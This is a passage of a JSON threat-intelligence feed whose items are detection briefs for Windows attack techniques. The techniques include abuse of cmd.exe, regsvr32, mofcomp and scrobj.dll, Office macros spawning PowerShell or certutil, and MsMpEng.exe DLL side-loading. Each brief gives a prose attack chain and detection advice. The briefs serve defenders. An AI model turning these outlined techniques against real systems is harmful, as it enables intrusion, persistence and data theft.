rule identifies the use of Windows script interpreters (cscript.exe or wscript.exe) executing a process via Windows Management Instrumentation (WMI), which may indicate malicious activity, especially when initiated by non-system accounts.","title":"Windows Script Interpreter Executing Process via WMI","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["execution","windows","cmd.exe"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies unusual parent processes spawning \u003ccode\u003ecmd.exe\u003c/code\u003e on Windows systems. While \u003ccode\u003ecmd.exe\u003c/code\u003e is a legitimate command-line interpreter, adversaries can exploit it by launching it from atypical parent processes to execute malicious commands stealthily. The rule focuses on identifying \u003ccode\u003ecmd.exe\u003c/code\u003e instances spawned by uncommon parent processes like \u003ccode\u003elsass.exe\u003c/code\u003e, \u003ccode\u003ecsrss.exe\u003c/code\u003e, and \u003ccode\u003eregsvr32.exe\u003c/code\u003e, which may indicate unauthorized or suspicious activity. The rule is based on the EQL query language and is designed for data generated by Elastic Defend, Microsoft Defender XDR, and SentinelOne Cloud Funnel, as well as Sysmon event logs. 
This detection helps in early threat detection by flagging anomalies in process relationships.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a malicious payload on the system.\u003c/li\u003e\n\u003cli\u003eThe malicious payload spawns \u003ccode\u003ecmd.exe\u003c/code\u003e to execute commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecmd.exe\u003c/code\u003e process is launched by an unusual parent process, such as \u003ccode\u003elsass.exe\u003c/code\u003e or \u003ccode\u003ecsrss.exe\u003c/code\u003e, instead of typical processes like \u003ccode\u003eexplorer.exe\u003c/code\u003e or \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecmd.exe\u003c/code\u003e process executes malicious commands, such as downloading additional payloads, modifying system configurations, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003ecmd.exe\u003c/code\u003e process to establish persistence on the system by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement by using \u003ccode\u003ecmd.exe\u003c/code\u003e to access other systems on the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data theft, system compromise, or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging an unusual parent process for \u003ccode\u003ecmd.exe\u003c/code\u003e can lead to a range of adverse outcomes, including system compromise, data theft, and ransomware deployment. The impact can vary depending on the attacker\u0026rsquo;s objectives and the level of access they gain. 
Without proper detection and response, organizations can suffer financial losses, reputational damage, and operational disruption. The severity is dependent on the specific commands executed via the spawned command prompt.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided EQL query to your Elastic Security environment to detect unusual parent processes for \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the necessary data for this detection and ensure proper configuration.\u003c/li\u003e\n\u003cli\u003eTune the EQL query for your environment by excluding legitimate parent processes, identified in the \u0026ldquo;False positive analysis\u0026rdquo; section, that may trigger false positives (e.g., \u003ccode\u003eSearchIndexer.exe\u003c/code\u003e, \u003ccode\u003eWUDFHost.exe\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule to determine the nature of the malicious activity and the extent of the compromise.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and logging for \u003ccode\u003ecmd.exe\u003c/code\u003e and its parent processes to detect similar anomalies in the future.\u003c/li\u003e\n\u003cli\u003eConsider deploying endpoint detection and response (EDR) solutions like Elastic Defend, Microsoft Defender XDR, or SentinelOne Cloud Funnel for enhanced visibility and protection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-unusual-cmd-parent/","summary":"The detection rule identifies cmd.exe instances spawned by uncommon parent processes, such as lsass.exe, csrss.exe, or regsvr32.exe, which may indicate unauthorized or suspicious activity, thus aiding in early threat detection.","title":"Unusual Parent Process for 
cmd.exe","url":"https://feed.craftedsignal.io/briefs/2024-01-unusual-cmd-parent/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SolarWinds.BusinessLayerHost.exe","SolarWinds.BusinessLayerHostx64.exe","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["supply-chain","execution","solarwinds"],"_cs_type":"advisory","_cs_vendors":["Elastic","SolarWinds","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious child processes initiated by SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe, excluding known legitimate operations. Adversaries may exploit the trusted SolarWinds processes to execute unauthorized programs with elevated privileges, bypassing security controls. The rule focuses on Windows systems and is designed to detect activity indicative of post-compromise actions following a supply chain attack. This detection is crucial for organizations that utilize SolarWinds software, as malicious actors could leverage compromised SolarWinds installations to gain unauthorized access and execute arbitrary code within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of the SolarWinds software supply chain (T1195.002).\u003c/li\u003e\n\u003cli\u003eMalicious code is injected into SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eThe compromised SolarWinds process spawns a suspicious child process.\u003c/li\u003e\n\u003cli\u003eThe child process executes a malicious command or binary, attempting to evade detection.\u003c/li\u003e\n\u003cli\u003eThe child process leverages Native APIs (T1106) to perform privileged actions.\u003c/li\u003e\n\u003cli\u003eLateral movement or data exfiltration may occur from the compromised host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA 
successful attack can lead to the execution of arbitrary code on systems running SolarWinds software. This can result in data theft, system compromise, and further propagation of the attack throughout the network. Organizations in various sectors utilizing SolarWinds products are potentially at risk. The impact may include loss of sensitive data, disruption of critical services, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious SolarWinds Child Process - CommandLine\u003c/code\u003e to detect potentially malicious child processes of SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious SolarWinds Child Process - Executable\u003c/code\u003e to detect execution of unusual executables as child processes of SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line details on Windows systems to ensure the Sigma rules have sufficient data.\u003c/li\u003e\n\u003cli\u003eReview and tune the rules for false positives based on legitimate SolarWinds child processes in your environment, updating the exclusion lists in the rules accordingly, referencing the \u0026ldquo;false_positives\u0026rdquo; section in the rule description.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-solarwinds-child-process/","summary":"Detection of unusual child processes spawned by SolarWinds processes may indicate malicious program execution, potentially bypassing security controls.","title":"Suspicious SolarWinds Child Process 
Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-solarwinds-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Elastic Endgame","Sysmon","Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eThis detection identifies suspicious usage of \u003ccode\u003escrobj.dll\u003c/code\u003e, a legitimate Windows library, when loaded into unusual Microsoft processes. Attackers may exploit \u003ccode\u003escrobj.dll\u003c/code\u003e to execute malicious scriptlets within trusted processes, thereby evading detection. This technique allows adversaries to proxy execution through trusted system binaries. The rule focuses on detecting anomalous activity by excluding common executables, and flagging only non-standard processes loading \u003ccode\u003escrobj.dll\u003c/code\u003e. The detection logic is based on identifying image load events where \u003ccode\u003escrobj.dll\u003c/code\u003e is loaded into unexpected processes, indicating a potential misuse of the library. 
The rule is designed for data generated by Elastic Defend, Elastic Endgame, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts or deploys a malicious scriptlet designed to execute malicious commands or payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a non-standard or less common Microsoft process to load \u003ccode\u003escrobj.dll\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003escrobj.dll\u003c/code\u003e is loaded into the target process, enabling the execution of scriptlets.\u003c/li\u003e\n\u003cli\u003eThe malicious scriptlet executes within the context of the trusted Microsoft process, bypassing application whitelisting or other security controls.\u003c/li\u003e\n\u003cli\u003eThe scriptlet performs malicious actions, such as downloading additional payloads, modifying system configurations, or establishing command and control communication.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objectives, such as data exfiltration, lateral movement, or persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within the context of a trusted process, bypassing security controls and potentially leading to full system compromise. This could result in data theft, system corruption, or further propagation of the attack within the network. 
The impact is significant because it allows malware to operate under the guise of legitimate system processes.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious Scrobj.dll Image Load\u003c/code\u003e to your SIEM to detect this activity (see rule below).\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 7 (Image Loaded) to collect the necessary data for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule \u003ccode\u003eSuspicious Scrobj.dll Image Load\u003c/code\u003e to determine the legitimacy of the \u003ccode\u003escrobj.dll\u003c/code\u003e loading activity.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to prevent unauthorized execution of scripts and binaries, focusing on processes identified in the detection rule.\u003c/li\u003e\n\u003cli\u003eContinuously audit scheduled tasks and exclude known safe processes from the detection rule to minimize false positives, as described in the rule\u0026rsquo;s Triage and Analysis section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-suspicious-scrobj-load/","summary":"Detection of scrobj.dll loaded into unusual Microsoft processes indicates potential malicious scriptlet execution for defense evasion and execution by abusing legitimate system binaries.","title":"Suspicious Script Object Execution via scrobj.dll","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-scrobj-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["execution","defense evasion","windows","regsvr32"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may abuse native Windows registration utilities such as \u003ccode\u003eregsvr32.exe\u003c/code\u003e, 
\u003ccode\u003eRegAsm.exe\u003c/code\u003e, and \u003ccode\u003eRegSvcs.exe\u003c/code\u003e to execute malicious code and bypass security controls. These utilities are often used to register and unregister COM objects and .NET assemblies, but can also be leveraged to download and execute arbitrary scripts from remote locations. The behavior is commonly seen in post-exploitation scenarios. This activity can be used to bypass application allow lists and evade defenses. This behavior has been observed across multiple threat actors and attack campaigns, making it a reliable indicator of suspicious or malicious activity. This detection focuses on the network connection initiated by these utilities, highlighting potential misuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means, such as exploiting a vulnerability or using stolen credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a registration utility (e.g., \u003ccode\u003eregsvr32.exe\u003c/code\u003e) to execute a malicious script or download a payload from a remote server.\u003c/li\u003e\n\u003cli\u003eThe registration utility makes an outbound network connection to a malicious server to download the payload.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, potentially leading to further compromise of the system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance on the compromised system to gather information about the environment.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems on the network, leveraging the compromised system as a pivot point.\u003c/li\u003e\n\u003cli\u003eThe attacker installs persistence mechanisms to maintain access to the compromised environment.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data or deploys ransomware, depending on their 
objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to install malware, steal sensitive data, or disrupt business operations. The affected systems can be used as a beachhead for further attacks on the internal network, potentially leading to widespread compromise. The use of signed Microsoft binaries makes detection more challenging, as these tools are often trusted by default. While the risk_score is low at 21 and severity low, this is often related to initial access and could lead to high impact down the line.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation (Event ID 1) and network connection (Event ID 3) logging to ensure visibility into the execution of registration utilities and their network activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect suspicious network connections initiated by \u003ccode\u003eregsvr32.exe\u003c/code\u003e, \u003ccode\u003eRegAsm.exe\u003c/code\u003e, and \u003ccode\u003eRegSvcs.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on the command-line arguments used and the destination IP addresses.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised system, restricting lateral movement.\u003c/li\u003e\n\u003cli\u003eMonitor for unexpected registry modifications associated with the execution of registration utilities, as these can indicate persistence mechanisms.\u003c/li\u003e\n\u003cli\u003eReview and update application allow lists to ensure that only authorized uses of registration utilities are 
permitted.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-regsvr-network-connection/","summary":"The native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection may indicate an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary.","title":"Suspicious Network Connection via Registration Utility","url":"https://feed.craftedsignal.io/briefs/2024-01-regsvr-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Office","Microsoft Word","Microsoft Excel","Microsoft PowerPoint","Outlook"],"_cs_severities":["medium"],"_cs_tags":["initial-access","defense-evasion","execution","discovery","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies suspicious child processes spawned by Microsoft Office applications (Word, PowerPoint, Excel, Outlook), which are commonly targeted for initial access via malicious documents or macro exploitation. The rule focuses on identifying anomalous process executions originating from these applications, a tactic often employed to execute arbitrary code or download additional payloads. Attackers leverage Office applications due to their widespread use and inherent scripting capabilities. Successful exploitation can lead to arbitrary code execution, lateral movement, and data exfiltration. This detection helps defenders identify and respond to potential security breaches originating from Microsoft Office applications, reducing the attack surface and minimizing potential damage. 
The rule specifically looks for processes like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, and others being spawned by Office applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user receives a malicious Microsoft Office document (e.g., Word, Excel) via email or downloads it from a compromised website.\u003c/li\u003e\n\u003cli\u003eThe user opens the document, triggering the execution of a malicious macro or exploitation of a vulnerability within the Office application.\u003c/li\u003e\n\u003cli\u003eThe Office application (e.g., \u003ccode\u003ewinword.exe\u003c/code\u003e, \u003ccode\u003eexcel.exe\u003c/code\u003e) spawns a suspicious child process such as \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe spawned process executes a command to download a malicious payload from a remote server using \u003ccode\u003ebitsadmin.exe\u003c/code\u003e or \u003ccode\u003ecertutil.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is a reverse shell or a malware dropper, which establishes a connection to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the compromised system and attempts to escalate privileges and perform reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses discovery commands with \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, \u003ccode\u003etasklist.exe\u003c/code\u003e, and \u003ccode\u003ewhoami.exe\u003c/code\u003e to map the environment and identify valuable targets.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems within the network, aiming to compromise critical assets and achieve their objectives, such as data theft 
or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to gain initial access to the compromised system. This can result in data theft, installation of malware, lateral movement to other systems, and ultimately, significant disruption to business operations. The widespread use of Microsoft Office makes it a prime target, potentially affecting a large number of users and organizations. Failure to detect and respond to these attacks can result in significant financial losses, reputational damage, and compromise of sensitive data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging (Sysmon Event ID 1 or Windows Security Event Logs) to ensure the visibility required to detect suspicious child processes.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious MS Office Child Process\u003c/code\u003e to your SIEM and tune the rule based on your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the \u003ccode\u003eSuspicious MS Office Child Process\u003c/code\u003e Sigma rule by examining the parent process tree and associated network connections.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized processes from Microsoft Office applications.\u003c/li\u003e\n\u003cli\u003eRegularly update Microsoft Office applications to patch known vulnerabilities.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains or IPs associated with malware delivery and command and control, based on threat intelligence feeds and IOCs from external 
sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-suspicious-office-child-process/","summary":"Detects suspicious child processes of Microsoft Office applications, indicating potential exploitation or malicious macros for initial access, defense evasion, and execution.","title":"Suspicious MS Office Child Process","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-office-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Elastic Endgame","Windows Security Event Logs","Crowdstrike"],"_cs_severities":["medium"],"_cs_tags":["execution","persistence","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Crowdstrike"],"content_html":"\u003cp\u003eThe rule detects suspicious usage of \u003ccode\u003emofcomp.exe\u003c/code\u003e, a command-line tool used to compile Managed Object Format (MOF) files. Attackers can abuse MOF files to manipulate the Windows Management Instrumentation (WMI) repository by building malicious WMI scripts for persistence or execution. This can be achieved by creating their own namespaces and classes within WMI or establishing persistence through WMI Event Subscriptions. The rule identifies unusual mofcomp.exe activity by filtering out legitimate processes and focusing on unusual executions, excluding known safe parent processes like \u003ccode\u003eScenarioEngine.exe\u003c/code\u003e and system accounts (\u003ccode\u003eS-1-5-18\u003c/code\u003e). This detection is designed to work with data from Elastic Defend, Microsoft Defender XDR, Crowdstrike, and Windows Security Event Logs. 
The rule aims to detect potential misuse of WMI for malicious purposes, enhancing the visibility of attacker techniques for execution and persistence.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., through phishing or exploitation of a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads a malicious MOF file to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003emofcomp.exe\u003c/code\u003e to compile the malicious MOF file.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emofcomp.exe\u003c/code\u003e processes the MOF file, creating new namespaces and classes or modifying existing ones in the WMI repository.\u003c/li\u003e\n\u003cli\u003eIf the MOF file creates a WMI Event Subscription, it triggers the execution of a malicious script or binary when a specific event occurs.\u003c/li\u003e\n\u003cli\u003eThe malicious script or binary executes, performing actions such as installing malware, creating backdoors, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence through the WMI Event Subscription, ensuring continued access even after system reboots.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via malicious MOF files can lead to persistent access, code execution, and system compromise. Attackers can use this technique to install malware, create backdoors, or steal sensitive data. The rule aims to detect early stages of such attacks, preventing significant damage. 
By establishing persistence, attackers can maintain long-term control over the compromised system, evading traditional detection methods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect suspicious \u003ccode\u003emofcomp.exe\u003c/code\u003e activity and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging and command-line auditing on Windows systems to capture necessary events for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on unusual MOF file paths, parent processes, and user accounts.\u003c/li\u003e\n\u003cli\u003eReview and monitor WMI namespaces and classes for unauthorized modifications or additions following any detected suspicious \u003ccode\u003emofcomp.exe\u003c/code\u003e activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-mofcomp-activity/","summary":"This rule detects suspicious mofcomp.exe activity. Attackers may leverage MOF files to manipulate the Windows Management Instrumentation (WMI) repository for execution and persistence; the rule filters out legitimate processes and focuses on unusual executions, excluding known safe parent processes and system accounts.","title":"Suspicious Mofcomp Activity","url":"https://feed.craftedsignal.io/briefs/2024-01-mofcomp-activity/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Antimalware Service Executable","Windows Defender","Microsoft Security Client","Elastic Defend","CrowdStrike Falcon","Microsoft Defender XDR","Sysmon"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","Elastic"],"content_html":"\u003cp\u003eThis detection identifies suspicious execution of the 
Microsoft Antimalware Service Executable (MsMpEng.exe) from non-standard paths or renamed instances. Attackers may attempt to evade defenses through DLL side-loading or by masquerading as the antimalware process. This technique is used to blend in with legitimate system activity and avoid detection by security tools. This rule is designed to detect instances where MsMpEng.exe is executed from unexpected locations or has been renamed, potentially indicating malicious activity. The rule leverages process monitoring data to identify deviations from the expected execution patterns of the antimalware service. This behavior has been seen associated with ransomware attacks, such as REvil.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious payload onto the system, placing it in a non-standard directory, such as a temporary folder or a user\u0026rsquo;s profile directory.\u003c/li\u003e\n\u003cli\u003eThe attacker renames or copies the legitimate MsMpEng.exe to the malicious payload\u0026rsquo;s location.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the renamed or copied MsMpEng.exe from the non-standard location. 
This is intended to mimic legitimate activity and evade detection.\u003c/li\u003e\n\u003cli\u003eThe malicious MsMpEng.exe then loads a malicious DLL through DLL side-loading, which executes arbitrary code within the context of the antimalware process.\u003c/li\u003e\n\u003cli\u003eThe malicious code performs actions such as disabling security controls, escalating privileges, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised system to move laterally within the network, compromising additional systems.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to complete system compromise, including the disabling of security controls, data theft, and ransomware deployment. This can result in significant financial losses, reputational damage, and disruption of business operations. Identifying and responding to this type of attack is critical to prevent further damage. 
The Sophos article references the REvil ransomware attack which impacted hundreds of businesses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture process execution events, including image path and command-line arguments, which are essential for detecting this behavior.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious MsMpEng.exe execution from unusual paths or renamed instances.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules to determine the legitimacy of the MsMpEng.exe execution and identify any potential malicious activity.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for instances where the process name is \u0026ldquo;MsMpEng.exe\u0026rdquo; but the executable path is outside the standard Windows Defender or Microsoft Security Client directories.\u003c/li\u003e\n\u003cli\u003eReview the references provided for additional context and guidance on investigating this type of activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-windefend-unusual-path/","summary":"Detects suspicious execution of the Microsoft Antimalware Service Executable (MsMpEng.exe) from non-standard paths or renamed instances, which may indicate an attempt to evade defenses through DLL side-loading or masquerading.","title":"Suspicious Microsoft Antimalware Service Executable Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-windefend-unusual-path/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Word","Excel","PowerPoint","Publisher","Access"],"_cs_severities":["low"],"_cs_tags":["persistence","execution","windows","image_load","scheduled_task"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis 
detection rule identifies a suspicious image load (\u003ccode\u003etaskschd.dll\u003c/code\u003e) originating from Microsoft Office applications (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, MSPUB.EXE, MSACCESS.EXE). The behavior suggests potential adversarial activity involving the creation of scheduled tasks through the Windows Component Object Model (COM). Attackers may exploit this technique to establish persistence, circumventing traditional monitoring focused on the \u003ccode\u003eschtasks.exe\u003c/code\u003e utility. The use of COM for scheduled task management allows for stealthier operation and evasion of standard security controls, making it a valuable persistence mechanism for malicious actors. The rule is designed for data generated by Elastic Defend, Sysmon, and other endpoint detection platforms.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser opens a malicious Microsoft Office document (e.g., Word, Excel).\u003c/li\u003e\n\u003cli\u003eThe document executes embedded macro code or exploits a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe macro or exploit leverages the Component Object Model (COM).\u003c/li\u003e\n\u003cli\u003eThe Office application (e.g., WINWORD.EXE) loads the \u003ccode\u003etaskschd.dll\u003c/code\u003e library, providing access to the Task Scheduler service.\u003c/li\u003e\n\u003cli\u003eThe COM interface is used to programmatically create a new scheduled task.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload at a later time or on a recurring basis.\u003c/li\u003e\n\u003cli\u003eThe malicious payload could be a script, executable, or command-line instruction.\u003c/li\u003e\n\u003cli\u003eUpon execution, the payload achieves the attacker\u0026rsquo;s objective, such as establishing persistence, downloading additional malware, or compromising the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
